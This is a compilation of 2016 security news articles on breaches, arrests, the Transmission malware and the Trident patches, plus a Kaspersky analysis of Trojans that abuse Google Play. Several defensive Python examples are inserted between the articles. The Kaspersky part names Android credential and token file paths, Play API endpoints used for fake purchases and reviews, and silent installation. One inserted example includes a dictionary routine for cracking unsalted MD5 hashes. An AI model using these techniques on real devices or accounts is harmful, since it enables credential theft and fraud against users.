This is why VPN services are frequently targeted by police and law enforcement while investigating crimes, and this is what appears to have happened with two servers belonging to Perfect Privacy.
The VPN provider informed its customers that two of its servers in Rotterdam, Netherlands, had been seized by the Dutch police on Thursday, August 24, without the company being contacted about a possible investigation or told why its servers were taken down.
The VPN provider says the authorities went directly to I3D with a subpoena requesting the hardware.
"Currently, we have no further information since the responsible law enforcement agency did not get in touch with us directly, we were merely informed by our hoster," Perfect Privacy explains. "Since we are not logging any data there is currently no reason to believe that any user data was compromised."
Perfect Privacy confirms that the company was back up and running the following day after I3D provided two replacement servers, meaning that the seizures did not result in any significant outage.
In April, Dutch Police seized Ennetcom servers based in the Netherlands and Canada to shut down its operations during a criminal investigation. Ennetcom was a company that sold customized BlackBerry phones connected to a PGP-encrypted network.
Dutch authorities accused Ennetcom of helping criminals protect their communications to carry out crimes, involving drug trafficking, assassinations, and other serious offenses.

Hacker Who Hacked Official Linux Kernel Website Arrested in Florida
3.9.2016 thehackernews Hacking
Around five years after unknown hackers gained unauthorized access to multiple kernel.org servers used to maintain and distribute the Linux kernel, police have arrested a South Florida computer programmer for carrying out the attack.
Donald Ryan Austin, a 27-year-old programmer from El Portal, Florida, was charged on Thursday with hacking servers belonging to the Linux Kernel Organization (kernel.org) and the Linux Foundation in 2011, the Department of Justice announced the same day.
The Linux Kernel Organization runs the kernel.org servers that distribute the Linux kernel, the heart of the operating system, whereas the Linux Foundation is a separate group that supports kernel.org.
According to an indictment [PDF] unsealed by federal prosecutors on Monday, Austin managed to steal login credentials of one of the Linux Kernel Organization system administrators in 2011 and used them to install a hard-to-detect malware backdoor, dubbed Phalanx, on servers belonging to the organization.
What made the breach so significant? Linux is the open-source operating system used by millions of corporate and government networks worldwide.
Using the Phalanx malware, Austin allegedly installed Ebury – a Trojan designed to compromise Linux, FreeBSD or Solaris systems – on a number of servers run by the Linux groups, which helped him harvest the login credentials of people using the servers.
Austin allegedly infected Linux servers, including "Odin1," "Zeus1," and "Pub3," which were leased by the Linux Foundation for operating kernel.org. He also hacked the personal email server of Linux Kernel Organization’s founder Peter Anvin.
Austin is also accused of using his unauthorized admin privileges to insert messages into the system that would be displayed when the servers restarted.
According to prosecutors, Austin's motive for the intrusion was to gain early access to Linux software builds distributed through the www.kernel.org website.
Bad Luck! Hacker Arrested while Breaking Traffic Rules
This security breach forced the Linux Foundation to shut down kernel.org completely while the malware infection was cleaned up, and to rebuild several of its servers. Miami Shores Police stopped Austin for a traffic violation on August 28 and arrested him after he was identified as a suspect in the 2011 case.
Austin is charged with four counts of “intentional transmission causing damage to a protected computer.” He was released from jail on a $50,000 bond provided by his girlfriend’s family.
The judge has ordered Austin to stay away from the Internet, computers, and every type of social media or e-mail service, citing his “substance abuse history.”
Austin is scheduled to appear in San Francisco federal court on September 21 before the Honorable Sallie Kim, and if found guilty he faces a possible sentence of 40 years in prison as well as $2 million in fines.

Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data

3.9.2016 securityaffairs BigBrothers

Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data and passport details of foreign visitors to Armenia.
A group of Azerbaijani hacktivists has leaked the passport details of foreign visitors to Armenia.

The data breach exposed internal resources of the Security Service (SNS) that are involved in updating information about foreign passports.

The hackers breached Armenian government servers stealing sensitive data, including passport scans. Intelligence experts who analyzed the data leaks confirmed their authenticity.

The Anti-Armenia Team took credit for a series of data leaks that the hackers claim were stolen from servers of the Armenian national security ministry.

“We would like to notice that Anti – Armenia team is an independent group, who is active for five years and repeatedly makes anxious Armenian side by its cyber attacks,” the group explained to El Reg.

Armenia and Azerbaijan are neighbouring countries that fought a war over the disputed Nagorno-Karabakh region between 1988 and 1994.

There is great tension between the two countries: in April, the Azerbaijani army tried to regain control of the Nagorno-Karabakh Republic, and the fighting caused the deaths of 350 people.

Azerbaijani Anti-Armenia Team
A source who spoke to El Reg on condition of anonymity said the leaked information is more likely to have come from an insider, ruling out the Anti-Armenia team’s claim to have hacked Armenian government systems.

“I am familiar with the incident, and [can] confirm, that such attacks really happened, and the documents are legitimate and not fake,” the source told El Reg. “I have more confidence that one of their employees having access to it has been compromised and technical border control service is a part of SNS (Security Service), that’s why there is such overlap, and the documents could be stolen from particular person, and not ‘systems’, like they claim.”

The notorious Hacker Guccifer sentenced 52 months in US prison
3.9.2016 securityaffairs Crime

The notorious Romanian hacker Guccifer has been sentenced to 52 months in prison by a US court for aggravated identity theft and hacking.
The notorious Romanian hacker Guccifer has been sentenced to prison by a US court.

Marcel Lehel Lazar (44), Guccifer’s real name, has been sentenced to 52 months in prison for aggravated identity theft and hacking into a protected computer.

Guccifer was arrested in January 2014 in Romania, where he was already known to law enforcement for hacking into the accounts of local celebrities. In June 2014 he pleaded guilty and was sentenced by a Romanian court to 7 years in prison for accessing the email accounts of the head of the Romanian intelligence service, George Maior, and of the politician Corina Cretu.

In March 2016, the Romanian authorities accepted the US request for Lazar’s extradition.

Guccifer is well known in the hacking community, but he became famous to the public after hacking the online accounts of numerous public figures, including members of the Bush family, journalists, actors, former members of the U.S. Cabinet and the U.S. Joint Chiefs of Staff, former Secretary of State Colin Powell, the senior political figure Sidney Blumenthal and a former presidential advisor.

Lazar also claimed to have hacked Hillary Clinton’s private email server; in recent months he gave a series of interviews to Fox News and NBC News, providing details about his intrusion.

Guccifer exploited Clinton’s connection with Blumenthal to access her email server.

Lazar first got into Blumenthal’s AOL email in March 2013 through detailed Internet research that helped him guess Blumenthal’s security question. From Blumenthal’s email, Lazar was then able to track emails based on IP headers and ultimately gain access to the Clinton email server.

Lazar described the server to NBC News (from a Bucharest jail cell) as ‘an open orchid on the Internet’ where he was able to find ‘hundreds of folders’. While he says he only accessed the server twice, he claims to have obtained 2 gigabytes of information. He has thus far refused to provide any of the emails to which he gained access. Of the 2 gigabytes of information, he has told Fox News that they are hidden because they are ‘too hot’ and ‘a matter of national security’.

Guccifer hacked Hillary Clinton email server (source: The Telegraph)

There has been concern about who has had access to the Clinton email server. Lazar has said he was able to see ‘up to 10,…, IPs from other parts of the world.’ Research into emails from Clinton’s time as Secretary of State has already identified approximately 2,200 emails containing classified information, some of them marked “Top Secret”.

According to US authorities, the hacker admitted having hacked email and social media accounts of roughly 100 Americans between October 2012 and January 2014.

Kali Linux 2016.2 — Download Latest Release Of Best Operating System For Hackers
2.9.2016 thehackernews OS
As promised at the Black Hat and Def Con security and hacking conferences, Offensive Security – the creators of the Swiss army knife for researchers, penetration testers, and hackers – has finally released the much-awaited Kali Linux 2016.2.
Kali Linux is an open-source Debian-based Linux distribution designed to help ethical hackers and security professionals, bringing a wide range of tools for penetration testing, forensics, hacking and reverse engineering together in a single package.
Earlier, the Kali Linux distribution was known as BackTrack.
Kali Linux 2016.2 is an updated Live ISO image of the popular GNU/Linux distribution that includes the latest software versions and enhancements for those who want to deploy the operating system on new systems.
What's new?
Besides bringing the updated Live ISOs of Kali Linux, the Kali Linux team brings multiple variants of the GNU/Linux distribution with various Desktop Environments, specifically KDE, Xfce, MATE, LXDE, and Enlightenment – all available only for 64-bit platforms.
What's even more exciting is that, from Kali Linux 2016.2 onwards, the team promises to release updated Live ISO images of Kali with new software versions and the latest security patches every week.
Since Kali Linux is the most advanced and widely used distro for penetration testing and forensics, this weekly update is exciting news for those involved in hacking and security-related projects.
It's been several months since the last update to the official Kali Linux Live ISOs, and a few hundred new or updated packages have been pushed to the Kali repositories since then.
This means that the packages in the previous Kali Linux ISOs lack bug fixes and OS improvements that are implemented in the most recent versions of the distro.
"Since our last release several months ago, there's a few hundred new or updated packages which have been pushed to the Kali reports," the Kali Linux team's announcement reads. "This means that anyone downloading an ISO even 3 months old has somewhat of a long 'apt-get dist-upgrade' ahead of them."
You can download the latest Kali Linux 2016.2 ISOs from its official website now. The Kali Linux team has also promised to bring a lot of exciting announcements in the next few weeks, so keep an eye on its announcements for the latest updates.

Hey, Music Lovers! Last.Fm Hack Leaks 43 Million Account Passwords
2.9.2016 THEHACKERNEWS Social
Another Day, Another Data Breach!
If you love to listen to music online and have an account on the Last.fm website, your account details may have been compromised in a data breach that leaked the personal data of more than 43 million users online.
Last.fm was hacked in March 2012, and three months after the breach the London-based music streaming service admitted the incident and issued a warning encouraging its users to change their passwords.
But now it turns out that the Last.fm data breach was massive, and four years later the stolen data has surfaced in public.
The copy of the hacked database obtained by the data breach indexing website LeakedSource contained 43,570,999 user records that were originally stolen from Last.fm on March 22, 2012, according to timestamps in the database.
The leaked records include usernames, hashed passwords, email addresses, the date when a user signed up to the website, and ad-related data.
Wait! Have you visited The Hacker News earlier this week? We reported on the massive Dropbox data breach, which also occurred in 2012 and let hackers get their hands on the online cloud storage accounts of more than 68 million users.
People Are Still So Bad At Picking Passwords
But what makes the Last.fm hack much worse is the weak security measures the website used to store its users’ passwords.
Last.fm stored its users’ passwords using MD5 hashing – which was considered outdated even before 2012 – and without any salt, the random string added to a password before hashing that makes the resulting hashes much more difficult for hackers to crack.
LeakedSource says it took them just 2 hours to crack 96% of all the passwords in the Last.fm data dump, which was possible because of the unsalted MD5 hashing used to store passwords.
"This algorithm is so insecure it took us two hours to crack and convert over 96 percent of them to visible passwords," LeakedSource said in its blog post, adding that it recently invested significantly in its own "password cracking capabilities for the benefit of our users."
And guess what? Analysis of the Last.fm passwords reveals that the most popular passwords users chose to secure their accounts were extremely weak:
255,319 people used the phrase 123456
92,652 used 'password' as password
Almost 67,000 used 'lastfm'
Around 64,000 used 123456789
46,000 used 'qwerty'
Almost 36,000 used 'abc123'
LeakedSource has added the data to its database, so if you have a Last.fm account you can check whether it has been compromised by searching for your data on LeakedSource’s search engine.
Last.fm is the latest to join the list of "Mega-Breaches" revealed in recent months, in which hundreds of millions of online credentials from years-old data breaches of popular social networking sites, including LinkedIn, MySpace, VK.com and Tumblr, were sold on the Dark Web.
The takeaway:
Change your password for your Last.fm account as well as your other online accounts immediately, especially if you use the same password on multiple sites.
Moreover, use a good password manager to create complex passwords for different websites and remember them for you.
We have listed some of the best password managers, which can help you understand the importance of a password manager and choose one according to your requirements.

Update your Mac OS X — Apple has released Important Security Updates
2.9.2016 THEHACKERNEWS Apple
If you own a Mac laptop or desktop, you need to update your system right now.
It turns out that the critical zero-day security vulnerabilities disclosed last week, which were used to target iPhone and iPad users, affect Mac users as well.
Late last week, Apple rolled out iOS 9.3.5 update to patch a total of three zero-day vulnerabilities that hackers could have used to remotely gain control of an iPhone by simply making the victim click a link.
Dubbed "Trident," the security holes were used to create spyware (surveillance malware) called 'Pegasus' that was apparently used to target human rights activist Ahmed Mansoor in the United Arab Emirates.
Pegasus could allow an attacker to access an incredible amount of data on a targeted victim, including text messages, calendar entries, emails, WhatsApp messages, the user's location, and the microphone.
Pegasus spyware could even allow an attacker to download the victim's passwords and steal the stored list of WiFi networks the device has connected to, along with their passwords.
Apple is now patching the same "Trident" bugs in Safari web browser on its desktop operating system, with urgent security updates for Safari 9 as well as OS X Yosemite and OS X El Capitan.
This is not a surprise, because iOS and OS X, and the mobile and desktop versions of the Safari browser, share much of the same codebase. Therefore, zero-days in Apple’s iOS showed up in OS X as well.
The Pegasus exploit takes advantage of the Trident bugs to remotely jailbreak a victim's device and install a collection of spying software onto it without the user’s knowledge.
One of the key components of the exploit takes advantage of a memory corruption bug in Safari's WebKit, allowing attackers to deliver the malicious payload when a targeted victim clicks on a malicious link and begin the process of taking over the operating system.
In an advisory, Apple warned that visiting a "maliciously crafted website" via Safari browser could allow attackers to execute arbitrary code on a victim's computer.
The patch updates that Apple released on Thursday fix the nasty Trident bugs, including CVE-2016-4654, CVE-2016-4655, and CVE-2016-4656, which were initially discovered and reported by mobile security startup Lookout and the University of Toronto’s Citizen Lab.
Based on a link sent to UAE human rights activist Ahmed Mansoor, Lookout Security and Citizen Lab traced the three programming blunders and the Pegasus spyware kit to the Israeli "cyber war" company NSO Group, which sells hacking exploits to governments such as the UAE.
Users can install security patches for Safari, El Capitan, and Yosemite via the usual software update mechanisms.

BitTorrent client Transmission found distributing Mac malware once again
2.9.2016 securityaffairs Virus

It has happened again: Mac users who downloaded the BitTorrent client Transmission might have been infected by the OSX/Keydnap malware.
Security experts from ESET have spotted the popular BitTorrent client Transmission distributing Mac malware called OSX/Keydnap, which is used to steal the contents of the OS X keychain and maintain a permanent backdoor on victims’ PCs.

This is the second time that the BitTorrent client Transmission has been used to deliver malicious code. In March, researchers from Palo Alto Networks Unit 42 discovered a malicious campaign, reported by Apple customers who were looking for the latest version of Transmission, that infected them with a new family of ransomware specifically designed to target OS X installations.

“On March 4, we detected that the Transmission BitTorrent client installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.”” states the report published by Palo Alto Networks.

The researchers named this new ransomware family KeRanger and also released a technical analysis of the malware.

Back to the present, researchers at ESET discovered that the Keydnap malware was spread through the official Transmission website.

“During the last hours, OSX/Keydnap was distributed on a trusted website, which turned out to be “something else”. It spread via a recompiled version of the otherwise legitimate open source BitTorrent client application Transmission and distributed on their official website.” reads the blog post published by ESET.

BitTorrent client Transmission malware

Transmission has promptly removed the malicious version from the download section; anyway, users who downloaded the client between Sunday and Monday should check whether their machine has been compromised.

Crooks could use the Keydnap malware to establish a backdoor on the compromised machine that allows them to execute remote commands on the Mac.

Two attacks leveraging the BitTorrent client Transmission, is it a coincidence?

Malware researchers from ESET noted many similarities between the two attacks; for example, in both cases the malicious code was added to the main function of the BitTorrent client Transmission. Also in this case, the OSX/Keydnap malicious code was signed with a legitimate code signing key, which allows the crooks to bypass the Gatekeeper protection system.

“In both cases, a malicious block of code is added to the main function of the Transmission application,” ESET said. “The code responsible for dropping and running the malicious payload is astonishingly the same. Just like in the KeRanger case, a legitimate code signing key was used to sign the malicious Transmission application bundle. It’s different from the legitimate Transmission certificate, but is still signed by Apple and bypasses Gatekeeper protection.”
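The ESET quote above makes the defensive point: Gatekeeper only checks that a bundle carries *some* valid Apple-issued Developer ID signature, so a re-signed Transmission passes even though the certificate is not the project's own. The check a practitioner wants is to pin the expected bundle identifier and Team ID, which is what the following added example does. It is not code from ESET, Apple or the Transmission project; the sample outputs are constructed in the shape `codesign -dvvv <app>` prints to stderr on macOS, and the bundle identifier, signer names and Team IDs in them are placeholders.

```python
import subprocess
from typing import Dict, List, Union

# Constructed samples (assumed shape of `codesign -dvvv` output). The first is
# what the project's own signature would look like; the second is the same app
# re-signed with a different, but still Apple-issued, Developer ID certificate.
SAMPLE_PROJECT_SIGNED = """\
Executable=/Applications/Transmission.app/Contents/MacOS/Transmission
Identifier=com.example.transmission
Format=app bundle with Mach-O thin (x86_64)
Authority=Developer ID Application: Example Project (EXAMPLE001)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=EXAMPLE001
"""

SAMPLE_RESIGNED = """\
Executable=/Applications/Transmission.app/Contents/MacOS/Transmission
Identifier=com.example.transmission
Format=app bundle with Mach-O thin (x86_64)
Authority=Developer ID Application: Someone Else (OTHER0002)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=OTHER0002
"""


def parse_codesign(output: str) -> Dict[str, Union[str, List[str]]]:
    """Turn codesign's key=value lines into a dict.

    'Authority' repeats once per certificate in the chain, leaf first, so it
    is collected as a list; every other key is kept as a plain string."""
    info: Dict[str, Union[str, List[str]]] = {"Authority": []}
    for line in output.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key == "Authority":
            info["Authority"].append(value)  # type: ignore[union-attr]
        else:
            info[key] = value
    return info


def signer_is_pinned(output: str, bundle_id: str, team_id: str) -> bool:
    """Gatekeeper asks 'is this any valid Developer ID?'; this asks
    'is it the Developer ID we expect?' by pinning bundle id and Team ID."""
    info = parse_codesign(output)
    authorities = info["Authority"]
    leaf_ok = bool(authorities) and authorities[0].startswith("Developer ID Application:")
    return (leaf_ok
            and info.get("Identifier") == bundle_id
            and info.get("TeamIdentifier") == team_id)


def check_app(path: str, bundle_id: str, team_id: str) -> bool:
    """Run codesign on a real bundle (macOS only) and apply the pin."""
    proc = subprocess.run(["codesign", "-dvvv", path],
                          capture_output=True, text=True)
    return proc.returncode == 0 and signer_is_pinned(proc.stderr, bundle_id, team_id)


if __name__ == "__main__":
    expected = ("com.example.transmission", "EXAMPLE001")
    print(signer_is_pinned(SAMPLE_PROJECT_SIGNED, *expected))  # True
    print(signer_is_pinned(SAMPLE_RESIGNED, *expected))        # False: valid cert, wrong team
```

Both samples would satisfy `spctl --assess`, because both chains end at Apple Root CA; only the pinned comparison distinguishes the project's certificate from the one the attackers used. On a real machine the Team ID to pin comes from a copy of the app you trust, not from the download under test.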

Experts speculate that the Transmission website was hacked and the attackers uploaded the malicious version of the BitTorrent client. ESET has notified Apple about the compromised developer certificate.

SWIFT discloses more cyber attacks on its bank members and urges more security
2.9.2016 securityaffairs Security

SWIFT discloses more attacks against banks worldwide, pressures banks on security and urges member banks to implement the new SWIFT software by November 19.
In recent months, a worrisome string of attacks against banks worldwide through the SWIFT system has alarmed the banking industry. The so-called “SWIFT hackers” have conducted multiple cyber attacks against financial institutions. We reported the successful cyber heists against the Bangladesh bank, a Ukrainian bank and an Ecuadorian bank, while a Vietnamese bank reported having blocked an ongoing cyber heist.

In May, a fourth bank, in the Philippines, was a victim of the SWIFT hackers, and experts at Symantec confirmed that the malware used by the crooks shares code with tools used by the notorious Lazarus group, which is linked to the North Korean Government.

According to the Reuters agency, SWIFT issued a new warning urging member banks to implement the new SWIFT software by 19 November.

The latest version of SWIFT’s software implements new security features specifically designed to defeat this kind of attack. The authentication processes have been improved, and mechanisms for the early detection of fraudulent activity have been added.

“Customers’ environments have been compromised, and subsequent attempts (were) made to send fraudulent payment instructions. The threat is persistent, adaptive and sophisticated – and it is here to stay.” states SWIFT.

The organization hasn’t provided further details on the alleged additional cyber attacks against banks worldwide.

“All the victims shared one thing in common,” says Reuters: “Weaknesses in local security that attackers exploited to compromise local networks and send fraudulent messages requesting money transfers.”


SWIFT told banks that it might report them to regulators and banking partners if they failed to adopt the new SWIFT software.

Despite SWIFT’s efforts, many experts argue that the new security features are not enough to consider the banking systems completely secure.

Of course, the cyber attacks have prompted regulators globally to press financial institutions to bolster their security defenses.

Roughly 43 Million Last.fm accounts were stolen in a 2012 security breach
2.9.2016 securityaffairs Crime

According to the breach notification service LeakedSource roughly 43 million Last.fm accounts were compromised in a 2012 incident.
In June 2012, the online music service Last.fm was compromised by hackers; in response, the company notified its users of the incident and invited them to change their passwords.

Some experts speculated the security breach took place several months earlier.

The company was using the MD5 hashing algorithm with no salt to protect passwords, which is known to be a weak implementation; for this reason, Last.fm also announced improvements to the way passwords are stored.

“We are currently investigating the leak of some Last.fm user passwords. This follows recent password leaks on other sites, as well as information posted online. As a precautionary measure, we’re asking all our users to change their passwords immediately.” states the Last.fm Password Security Update.

“We strongly recommend that your new Last.fm password is different to the password you use on other services.”

The real number of impacted users was not disclosed at the time of the data breach, but now we know more about the incident. According to the breach notification service LeakedSource roughly 43 million accounts were compromised in the incident.

The leaked records include usernames, passwords, email addresses, dates of registration and some other internal data.

“Music service Last.fm was hacked on March 22nd, 2012 for a total of 43,570,999 users. This data set was provided to us by daykalif@xmpp.jp and Last.fm already knows about the breach but the data is just becoming public now like all the others.” reported LeakedSource.

“Each record contains a username, email address, password, join date, and some other internal data. We verified the legitimacy of this data set with Softpedia reporter Catalin C who was in the breach himself along with his colleagues.”

According to LeakedSource, its experts managed to crack 96 percent of the unsalted MD5 hashes within a couple of hours.
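The following added example (not code from Last.fm, LeakedSource or the article) shows why unsalted MD5 falls so quickly and what the fix looks like. The user names, passwords and the small dictionary are constructed for the demonstration: with no salt, every dictionary word is hashed once and that one hash matches every user who chose it, and two users with the same password have the same stored value. The salted, iterated scheme (PBKDF2-HMAC-SHA256 from the standard library, with a random per-user salt) removes both properties.

```python
import hashlib
import hmac
import os

# Constructed sample data (not from the leak): four users, three of whom
# chose passwords that appear in a small dictionary.
WORDLIST = ["123456", "password", "qwerty", "lastfm", "music"]
USERS = {
    "alice": "123456",
    "bob": "password",
    "carol": "correct horse battery staple",
    "dave": "123456",
}

PBKDF2_ITERATIONS = 100_000


def unsalted_md5(password):
    """The 2012 Last.fm scheme: MD5 of the password, no salt."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def recover_unsalted(stored, wordlist):
    """Dictionary lookup against unsalted hashes.

    Each dictionary word is hashed exactly once, and that single hash matches
    every user who chose that word; the work does not grow with the number
    of users, which is why tens of millions of hashes fall in hours.
    """
    lookup = {unsalted_md5(word): word for word in wordlist}
    return {user: lookup[h] for user, h in stored.items() if h in lookup}


def store_password(password, salt=None):
    """Salted, iterated hash: PBKDF2-HMAC-SHA256 with a random 16-byte salt.

    Returns (salt_hex, digest_hex); the salt is stored next to the digest.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return salt.hex(), digest.hex()


def verify_password(password, salt_hex, digest_hex):
    """Recompute the digest with the stored salt and compare in constant time."""
    _, candidate = store_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, digest_hex)


def demo():
    """Returns (users recovered from unsalted MD5,
                whether alice and dave share a hash under MD5,
                whether alice and dave share a hash under the salted scheme)."""
    unsalted = {user: unsalted_md5(pw) for user, pw in USERS.items()}
    recovered = recover_unsalted(unsalted, WORDLIST)
    same_unsalted = unsalted["alice"] == unsalted["dave"]
    salted = {user: store_password(pw) for user, pw in USERS.items()}
    same_salted = salted["alice"][1] == salted["dave"][1]
    return recovered, same_unsalted, same_salted


if __name__ == "__main__":
    print(demo())
```

The iteration count is a tunable cost; a real deployment would pick it (or use scrypt/Argon2) so that one verification takes a noticeable fraction of a second on the server, which is exactly the cost the unsalted MD5 scheme never imposed on whoever held the leaked data.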

The top 10 passwords were shown in an image (last.fm top passwords) that is not reproduced here.

The revelation about the Last.fm data breach arrives a couple of days after Dropbox confirmed that hackers stole 68 million accounts in 2012.

Unfortunately, the list of data breaches is very long and includes other IT giants, such as LinkedIn, MySpace, VK.com and Tumblr.

How Trojans manipulate Google Play
1.9.2016 Kaspersky Android
For malware writers, Google Play is the promised land of sorts. Once there, a malicious application gains access to a wide audience, gains the trust of that audience and experiences a degree of leniency from the security systems built into operating systems. On mobile devices, users typically cannot install applications coming from sources other than the official store, meaning this is a serious barrier for an app with malicious intent. However, it is far from easy for the app to get into Google Play: one of the main conditions for it is to pass a rigorous check for unwanted behavior by different analysis systems, both automatic and manual.

Some malware writers have given up on their efforts to push their malicious creations past security checks, and instead learned how to use the store’s client app for their unscrupulous gains. Lately, we have seen many Trojans use the Google Play app during promotion campaigns to download, install and launch apps on smartphones without the owners’ knowledge, as well as leave comments and rate apps. The apps installed by the Trojan do not typically cause direct damage to the user, but the victim may have to pay for the created excessive traffic. In addition, the Trojans may download and install paid apps as if they were free ones, further adding to the users’ bills.

Let us look at how such manipulations of Google Play are carried out.

Level 1. N00b

The first method is to make the official Google Play app store perform the actions the cybercriminal wants. The idea is to use the Trojan to launch the client, open the page of the required app in it, and then use special code to find and interact with the interface elements (buttons) so that the application is downloaded, installed and launched. The misused interface elements are outlined with red boxes in the screenshots (not reproduced here).

The exact methods of interaction with the interface vary. In general, the following techniques may be identified:

Use of the Accessibility services of the operating system (used by modules in Trojan.AndroidOS.Ztorg).
Imitation of user input (used by Trojan-Clicker.AndroidOS.Gopl.c).
Code injection into the process of Google Play client to modify its operation (used by Trojan.AndroidOS.Iop).
To see how such Trojans operate, let us look at the example of Trojan.AndroidOS.Ztorg.n. This malicious program uses Accessibility services, which were originally intended for applications that help people with disabilities, such as GUI voice control apps. The Trojan receives a job from the command and control (C&C) server containing a link to the required application, opens it in Google Play, and then launches the following code:

[code screenshot not reproduced]

This code is needed to detect when the required interface element appears on the screen and to emulate a click on it. This way, the following buttons are clicked in sequence: “BUY” (the price is shown on the button), “ACCEPT” and “CONTINUE”. This is sufficient to purchase the app if the user has a credit card with a sufficient balance linked to his/her Google account.
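Because this whole technique depends on an accessibility service that the user (or a rooter) has enabled, one cheap defensive check is to audit which accessibility services are active on a device and compare them with what is expected. The following is an added example, not code from Kaspersky or from any of the Trojans described; it parses the value of the `enabled_accessibility_services` secure setting (as returned by `adb shell settings get secure enabled_accessibility_services`, a colon-separated list of flattened Android component names) against an allowlist. The sample setting value and the package `com.example.cleaner` are constructed; the TalkBack package name is Google’s real screen reader, and the `com.example.corp.kiosk` allowlist entry is hypothetical.

```python
# Audit of enabled Android accessibility services against an allowlist.
# Added example for illustration; the package names below are constructed
# except for TalkBack, Google's screen reader.

# Services an organisation might legitimately expect (constructed allowlist).
ALLOWED_PACKAGES = {
    "com.google.android.marvin.talkback",
    "com.example.corp.kiosk",  # hypothetical in-house kiosk app
}

# Constructed output of:
#   adb shell settings get secure enabled_accessibility_services
# The value is a colon-separated list of flattened component names, either
# "package/fully.qualified.Class" or the short form "package/.Class";
# it is the string "null" when no service is enabled.
SAMPLE_SETTING = (
    "com.google.android.marvin.talkback/"
    "com.google.android.marvin.talkback.TalkBackService:"
    "com.example.cleaner/.BoostService"
)


def parse_enabled_services(setting_value):
    """Split the setting into (package, fully qualified class) tuples."""
    if setting_value is None:
        return []
    value = setting_value.strip()
    if value in ("", "null"):
        return []
    services = []
    for entry in value.split(":"):
        if not entry:
            continue
        package, _, cls = entry.partition("/")
        if cls.startswith("."):  # short form: class is relative to the package
            cls = package + cls
        services.append((package, cls))
    return services


def audit_accessibility(setting_value, allowed_packages):
    """Return the enabled services whose package is not on the allowlist.

    Anything returned here has the same power over the Google Play client
    that the Ztorg module abuses, so it deserves a look.
    """
    return [
        (pkg, cls)
        for pkg, cls in parse_enabled_services(setting_value)
        if pkg not in allowed_packages
    ]


if __name__ == "__main__":
    for pkg, cls in audit_accessibility(SAMPLE_SETTING, ALLOWED_PACKAGES):
        print("unexpected accessibility service:", pkg, cls)
```

On a fleet of managed devices the same parsing can be fed from an MDM inventory instead of `adb`; the point is that the list of enabled accessibility services is short, stable and easy to baseline, so any new entry is a strong signal.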

Level 2. Pro

Some malware writers take the road less traveled. Instead of using the easy and reliable approach described above, they create their own client for the app store using its HTTPS API.


The difficult part about this approach is that the operation of the self-made client requires information (e.g. user credentials and authentication tokens) which is not available to a regular app. However, the cybercriminals are very fortunate that all required data are stored on the device in clear text, in the convenient SQLite format. Access to the data is restricted by the Android security model; however, apps may bypass it, e.g. by rooting the device and thus gaining unlimited access.

For example, some versions of the Trojan.AndroidOS.Guerrilla.a have their own client for Google Play, which is distributed with the help of the rooter Leech. This client successfully fulfils the task of downloading and installing free and paid apps, and is capable of rating apps and leaving comments in the Google store.

After launch, Guerrilla starts to collect the following required information:

The credentials to the user’s Google Play account.

Activities in Google Play require special tokens that are generated when the user logs in. When the user is already logged in to Google Play, the Trojan can use the locally cached tokens. They can be located through a simple search through the database located at /data/system/users/0/accounts.db:

[screenshot omitted]

With the help of the code below, the Trojan checks if there are ready tokens on the infected device, i.e. if the user has logged on and can do activities in Google Play:

[code screenshot omitted]

If no such tokens are available, the Trojan obtains the user’s username and hashed password, and authenticates via OAuth:

[code screenshots omitted]

Android_id is the device’s unique ID.
Google Service Framework ID is the device’s identifier across Google services.

First, the Trojan attempts to obtain this ID using regular methods. If these fail for whatever reason, it executes the following code:

[code screenshots omitted]

Google Advertising ID is the unique advertising ID provided by Google Play services.

Guerrilla obtains it as follows:

[code screenshots omitted]

In a similar way, the Trojan obtains hashed data about the device from the file “/data/data/com.google.android.gms/shared_prefs/Checkin.xml”.

When the Trojan has collected the above data, it begins to receive tasks to download and install apps. Below is the structure of one such task:

[screenshot of the task structure omitted]

The Trojan downloads the application by sending POST requests using the links below:

https://android.clients.google.com/fdfe/search: a search is performed for the query sent by the cybercriminals. This request is needed to simulate the user’s interaction with the Google Play client (the normal scenario of installing apps from the official client presupposes that the user first performs a search and only then visits the app’s page).
https://android.clients.google.com/fdfe/details: with this request, additional information needed to download the app is collected.
https://android.clients.google.com/fdfe/purchase: the token and purchase details are downloaded, used in the next request.
https://android.clients.google.com/fdfe/delivery: the Trojan receives the URL and the cookie-files required to download the Android application package (APK) file.
https://android.clients.google.com/fdfe/log: the download is confirmed (so the download counter is incremented).
https://android.clients.google.com/fdfe/addReview: the app is rated and a comment is added.
When creating the requests, the cybercriminals attempted to simulate as accurately as possible the equivalent requests sent by the official client. For example, the following set of HTTP headers is used in each request:

[screenshot of the HTTP headers omitted]

After the request is executed, the app may (optionally) get downloaded, installed (using the command ‘pm install -r’ which allows for installation of applications without the user’s consent) and launched.


The Trojans that use the Google Play app to download, install and launch apps from the store to a smartphone without the device owner’s consent are typically distributed by rooters – malicious programs which have already gained the highest possible privileges on the device. It is this particular fact that allows them to launch such attacks on the Google Play client app.

This type of malicious program poses a serious threat: in Q2 2016, different rooters occupied more than half of the Top 20 mobile malware. Moreover, rooters can download not only malicious programs that compromise the Android ecosystem and spend the user’s money on unnecessary paid apps, but other malware as well.

The Hunt for Lurk
1.9.2016 Kaspersky Virus
In early June, 2016, the Russian police arrested the alleged members of the criminal group known as Lurk. The police suspected Lurk of stealing nearly three billion rubles, using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations, including banks. For Kaspersky Lab, these arrests marked the culmination of a six-year investigation by the company’s Computer Incidents Investigation team. We are pleased that the police authorities were able to put the wealth of information we accumulated to good use: to detain suspects and, most importantly, to put an end to the theft. We ourselves gained more knowledge from this investigation than from any other. This article is an attempt to share this experience with other experts, particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks.

